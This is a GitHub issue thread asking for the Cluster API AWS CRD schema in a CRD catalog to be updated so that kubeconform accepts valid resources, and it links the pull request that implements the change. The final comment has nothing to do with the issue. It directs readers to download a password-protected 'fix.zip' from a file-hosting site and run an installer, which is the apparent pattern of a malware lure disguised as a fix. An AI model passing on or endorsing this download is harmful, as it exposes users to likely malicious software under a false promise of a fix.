### ISSUE TITLE
Update Cluster API AWS CRD to support new fields

### ISSUE THREAD

**Issue by afarbos** [datreeio/CRDs-catalog#375]
Currently some fields are missing from Cluster API AWS CRD and make kubeconform fails on valid resources.
For example, `spec.addons.configuration` https://doc.crds.dev/github.com/kubernetes-sigs/cluster-api-provider-aws/controlplane.cluster.x-k8s.io/AWSManagedControlPlane/v1beta2@v2.6.1#spec-addons-configuration

Implemented by https://github.com/datreeio/CRDs-catalog/pull/374 .

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
